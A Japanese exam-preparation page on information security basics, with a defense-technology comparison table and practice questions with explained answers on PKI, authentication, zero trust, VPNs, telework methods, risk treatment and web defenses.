技術配置場所役割防ぐものレイヤー
ファイアウォールネットワーク境界(最外側)パケットの出入りを制御、ポート制限不正な接続、許可されていないポートネットワーク層(L3-L4)
IDSネットワーク内不正なトラフィックを検知(検知のみ)既知の攻撃パターンネットワーク層(L3-L4)
IPSネットワーク内不正なトラフィックを検知して自動ブロック既知の攻撃パターンネットワーク層(L3-L4)
WAFWeb サーバー前面HTTP/HTTPS の攻撃を検知・ブロックSQL インジェクション、XSS、CSRF などアプリケーション層(L7)

防ぐことができない例

  • ファイアウォール:HTTP ポート 80 を開いていれば、その後ろの SQL インジェクションは通す
  • IDS/IPS:内部ネットワークの脅威(感染した社員 PC)は対象外
  • WAF:ネットワークレベルの DDoS 攻撃は対象外

確認問題 6:電子署名 / 電子証明書 / 認証局 / PKI の判定

次の説明に最も適切な語を答えてください。

(A)「この公開鍵は確かに A 社のものです」と第三者が証明したデータ

(B)その証明を発行し、失効管理も行う第三者機関

(C)文書の作成者本人性と改ざん有無を確認するため、ハッシュ値に秘密鍵を用いて付与するもの

(D)上記の仕組み全体を支える公開鍵の信頼基盤


解答例

  • (A)電子証明書
  • (B)認証局(CA)
  • (C)電子署名
  • (D)PKI(公開鍵基盤)

確認問題 7:認証方式の切り分け

次の状況で、最も中心になる認証方式を答えてください。

(A)ログインのたびに、アプリに表示される 6 桁の数字が変わる

(B)サーバが乱数を送り、利用者側は秘密情報から計算した値だけを返すので、パスワードそのものは送らない

(C)普段使わない国や端末からのアクセス時だけ、追加でコード入力を求める

(D)一度社内ポータルで認証すると、会計システムや勤怠システムに再ログインせず入れる


解答例

  • (A)ワンタイムパスワード(OTP)
  • (B)チャレンジレスポンス認証
  • (C)リスクベース認証
  • (D)シングルサインオン(SSO)

確認問題 8:認証連携技術の役割分担

次の説明に最も適切な語を答えてください。

(A)ユーザー ID、所属、メールアドレスなどを階層構造で管理する仕組み

(B)無線 LAN や VPN で、アクセスサーバから送られた認証要求を受けて判定するプロトコル

(C)チケットを用いて、パスワードを都度送らずに本人確認を行う方式

(D)他サービスに対して、利用者の権限の範囲だけを委ねる仕組み

(E)OAuth 2.0 に本人確認の仕組みを加えた、モダンなログイン連携方式


解答例

  • (A)LDAP
  • (B)RADIUS
  • (C)Kerberos
  • (D)OAuth 2.0
  • (E)OpenID Connect

確認問題 9:端末管理とゼロトラストの判断

次の状況で、最も適切な組み合わせや考え方を答えてください。

(A)社員の私物スマホで業務メールを使うが、業務文書だけは持出し制御したい

(B)会社支給スマホを一括配布し、紛失時には遠隔ワイプしたい

(C)テレワーク環境で、社内外を区別せず、アクセスのたびにユーザーと端末の状態を確認したい

(D)一度の認証で勤怠、経費、会計システムに順次入れるようにしたい


解答例

  • (A)BYOD + MCM
  • (B)COPE + MDM
  • (C)ゼロトラスト
  • (D)SSO

解説

  • A:私物端末の利用方針は BYOD、業務文書単位の統制は MCM が中心です。
  • B:会社端末を配り、端末全体を制御するので COPE と MDM の組み合わせが自然です。
  • C毎回検証社内外を前提にしない はゼロトラストの合図です。
  • D:認証強化ではなく、認証結果を複数システムで使い回す利便性の話なので SSO です。

確認問題 10:パスキー / OTP / SSO の切り分け

次の状況で、最も中心になる方式を答えてください。

(A)スマートフォンやPCに保存された認証情報を使い、パスワードを入力せずにログインする

(B)ログイン時に、認証アプリが表示した6桁コードを追加で入力する

(C)社内ポータルで一度認証すると、会計・勤怠・経費システムに再入力なしで入れる


解答例

  • (A)パスキー
  • (B)ワンタイムパスワード(OTP)
  • (C)シングルサインオン(SSO)

確認問題 11:タイムスタンプ / CRL / OCSP の役割

次の説明に最も適切な語を答えてください。

(A)電子文書がその時刻に存在し、その後改ざんされていないことを示す仕組み

(B)失効した証明書の一覧をまとめて配布し、照合に使う仕組み

(C)特定の証明書が今も有効かどうかを、その場で問い合わせて確認する仕組み


解答例

  • (A)タイムスタンプ
  • (B)CRL
  • (C)OCSP

確認問題 12:リスク対応 4 類型の判定

次の対策を、回避低減移転受容 のいずれに分類してください。

  1. 高リスクの外部公開機能そのものを廃止する
  2. 多要素認証と教育により情報漏えいの発生確率を下げる
  3. サイバー保険に加入して経済的損失に備える
  4. 影響が軽微でコストに見合わないため、監視だけして受け入れる

解答

1 → 回避 2 → 低減 3 → 移転 4 → 受容

解説

  • 1番:リスク源自体をなくしているので回避です。
  • 2番:確率や影響を下げる対策なので低減です。
  • 3番:損失負担の一部を保険会社へ移すので移転です。
  • 4番:分析したうえで意識的に受け入れるので受容です。

確認問題 13:WAF / CSP / SameSite の切り分け

次の状況で、最も中心になる技術を答えてください。

(A)Web サーバーの手前で、不審な HTTP リクエストを遮断したい

(B)ブラウザに対して、信頼した出所の JavaScript だけを実行させたい

(C)別サイトからのリクエストでは、認証用 Cookie を送りにくくしたい


解答例

  • (A)WAF
  • (B)CSP
  • (C)SameSite

解説

  • A:サーバー前面でリクエストを検査するので WAF です。
  • B:ブラウザ内での読み込み元制御なので CSP です。
  • C:Cookie の送信条件を制御するので SameSite です。

確認問題 14:IDS / IPS / EDR / SIEM の役割分担

次の説明に最も適切な語を答えてください。

(A)ネットワーク通信を見て、不審なパターンを検知したら管理者へ通知する

(B)ネットワーク通信を見て、不審な通信を自動的に遮断する

(C)PC やサーバ上の不審プロセスや外部通信を監視し、隔離などの初動対応を行う

(D)複数機器からログを集め、相関分析で全体の異常を見つける


解答例

  • (A)IDS
  • (B)IPS
  • (C)EDR
  • (D)SIEM

解説

  • A / B:どちらもネットワーク監視ですが、通知だけ なら IDS、遮断まで なら IPS です。
  • C:端末内の挙動を見るので EDR です。
  • D:ログ集約と相関分析が中心なので SIEM です。

確認問題 15:VPN 種別とテレワーク方式の判断

次の状況で、最も中心になる方式を答えてください。

(A)本社と支社のルータ同士を、インターネット上で暗号化して常時接続したい

(B)社員が自宅の PC から、ブラウザ経由で社内システムへ安全に入りたい

(C)通信事業者が提供する閉域網で、複数拠点を結びたい

(D)手元の PC では画面だけを表示し、実際の処理とデータは社内側の仮想デスクトップに置きたい


解答例

  • (A)IPsec VPN
  • (B)SSL VPN
  • (C)IP-VPN
  • (D)仮想デスクトップ方式

解説

  • A:拠点やルータ同士の暗号化トンネルなので IPsec VPN です。
  • B:個人端末のリモートアクセスなので SSL VPN が自然です。
  • C:閉域網サービスなので IP-VPN です。
  • D:通信路よりも作業環境の配置が中心なので、仮想デスクトップ方式です。

確認問題 16:クリックジャッキングと X-Frame-Options の切り分け

次の状況で、最も中心になる攻撃または対策を答えてください。

(A)攻撃者が透明な iframe を重ね、利用者に別のボタンを押させて送金操作を実行させる

(B)自社の画面を他サイトの frameiframe に埋め込ませないようにしたい

(C)他サイトに埋め込まれたページで、どのサイトからの埋め込みを許すかを細かく制御したい


解答例

  • (A)クリックジャッキング
  • (B)X-Frame-Options
  • (C)CSP の frame-ancestors

解説

  • A:画面の重ね合わせで誤クリックを誘うのでクリックジャッキングです。
  • BDENYSAMEORIGIN で埋め込みを防ぐ代表的なヘッダです。
  • C:より細かい埋め込み元制御なら CSP の frame-ancestors を使います。

確認問題 17:EPP / EDR / DLP の役割分担

次の状況で、最も中心になる技術を答えてください。

(A)既知マルウェアの実行をシグネチャで事前にブロックしたい

(B)端末感染後の不審プロセスや外部通信を監視し、隔離まで行いたい

(C)個人情報ファイルをメール添付や USB 持ち出しで外へ出さないようにしたい


解答例

  • (A)EPP
  • (B)EDR
  • (C)DLP

解説

  • A:侵入前の予防が中心なので EPP です。
  • B:侵入後の挙動監視と対応なので EDR です。
  • C:情報の持出し経路を制御するので DLP です。

確認問題 18:テレワーク方式の分類

次の状況で、最も中心になる方式を答えてください。

(A)社員の私物スマホに業務専用の隔離領域を作り、その中だけでメールと文書閲覧を許可する

(B)自宅 PC から、会社に置いた PC の画面を遠隔操作して業務を行う

(C)自宅 PC から、VDI 基盤上の仮想デスクトップへ接続して作業する

(D)特殊なブラウザ経由で Web アプリ中心の業務を行い、端末側への保存を抑えたい

(E)社内ネットワークを経由せず、SaaS へ直接アクセスして業務を完結させたい


解答例

  • (A)セキュアコンテナ方式
  • (B)リモートデスクトップ方式
  • (C)仮想デスクトップ方式
  • (D)セキュアブラウザ方式
  • (E)クラウドサービス方式

解説

  • A:端末内に業務専用の箱を作るのでセキュアコンテナ方式です。
  • B:オフィス設置 PC の画面を触るのでリモートデスクトップ方式です。
  • C:VDI 基盤上の環境を遠隔操作するので仮想デスクトップ方式です。
  • D:特殊ブラウザ経由で使うのでセキュアブラウザ方式です。
  • E:最初からクラウドへ直接入るのでクラウドサービス方式です。

確認問題 19:共通鍵方式と公開鍵方式の主語を追う

次の説明のうち、正しいものを答えてください。

(A)B さんが A さんへ顧客名簿を送りたい。B さんが任意に決めた 1 つの鍵で暗号化し、その同じ鍵を別経路で A さんへ伝えて復号してもらう。これは共通鍵方式の説明として読める

(B)B さんが A さんの公開鍵で暗号化し、B さんの秘密鍵で復号する。これは公開鍵方式の説明として正しい

(C)B さんが A さんの公開鍵で暗号化し、A さんの秘密鍵で復号する。これは公開鍵方式の説明として正しい


解答例

  • (A)正しい
  • (B)誤り
  • (C)正しい

解説

  • A:暗号化と復号で 同じ鍵 を使うので、方式としては共通鍵方式です。安全な鍵配送かどうかは別論点ですが、方式の説明としては読めます。
  • B:受信者 A さんの公開鍵で暗号化したなら、復号できるのは A さんの秘密鍵です。送信者 B さんの秘密鍵では復号できません。
  • C受信者の公開鍵で暗号化し、受信者の秘密鍵で復号する が公開鍵暗号の基本です。

ポイント

  • 秘密メッセージを送るときは、誰が読みたいのか を基準に鍵を追います。
  • 署名の問題と混ざったら、暗号化は受信者側の鍵、署名は送信者側の鍵 に戻って整理してください。

関連ページ

このページは役に立ちましたか?

評価とひとことを残してもらえると、内容と導線の改善に使えます。

Last updated on

On this page

このページの役割学習のポイント試験で何が問われるか定義と仕組みセキュリティの 3 要素 (CIA) と 4 要素暗号化方式共通鍵暗号 (対称鍵暗号)公開鍵暗号 (非対称鍵暗号)ハイブリッド暗号 (実際の運用)暗号化 / 圧縮 / 符号化 の違いハッシュ関数デジタル署名認証技術3 つの認証要素多要素認証 (MFA: Multi-Factor Authentication)生体認証の評価指標 ─ FAR・FRR・EER読み方のコツワンタイムパスワード / チャレンジレスポンス / リスクベース認証シングルサインオン (SSO) と関連技術SAML / OAuth 2.0 / OpenID Connect / LDAP / RADIUS / Kerberos を 1 枚で切るFIDO / パスキー / ワンタイムパスワード / SSO を切り分けるLDAP・RADIUS・Kerberos の位置づけ試験での見分け方公開鍵基盤 (PKI: Public Key Infrastructure)電子署名 / 電子証明書 / 認証局 / PKI の切り分けCRL / OCSP の違いタイムスタンプと電子保存暗号化・認証まとめマルウェアと脅威マルウェアの種類Web 攻撃主要な 3 つの Web 攻撃比較詳細な仕組みと具体例WAF / CSP / SameSite をどう切り分けるかクリックジャッキングと X-Frame-Options をどう切るかその他の脅威セキュリティ対策技術ネットワークセキュリティ対策IDS / IPS / EDR / SIEM を 1 枚で切るEPP / EDR / DLP を役割で分けるVPN の種類VPN 種別を利用場面で切るVPN 方式と仮想デスクトップ方式を分けて考えるテレワーク方式を 1 枚で切るモバイル端末管理と BYODBYOD / COPE / MDM / MCM を組み合わせで切るゼロトラストなぜゼロトラストが必要になったのか従来型(境界型防御)vs ゼロトラストゼロトラストの 7 つの基本原則ゼロトラストと VPN / SSO / MFA の関係ISMS とセキュリティ関連規格JIS Q 27000 系でのリスクマネジメントの流れリスク対応 4 類型を 1 枚で切るリスク分析アプローチの 4 類型典型的なつまずき問題を解くときの観点視点 1:「何を守るのか」で分類視点 2:「どの技術で守るのか」で分類視点 3:「鍵の個数」が問われたら視点 3.5:「認証方式の種類」が問われたら視点 3.6:「認証基盤のどの層か」が問われたら視点 3.7:「リスク対応 4 類型」が問われたら視点 4:「脅威と対策」の対応関係視点 5:「対策技術の層」で分類視点 5.5:「VPN の種類とテレワーク方式」が問われたら視点 6:「従来型防御 vs ゼロトラスト」確認問題関連ページ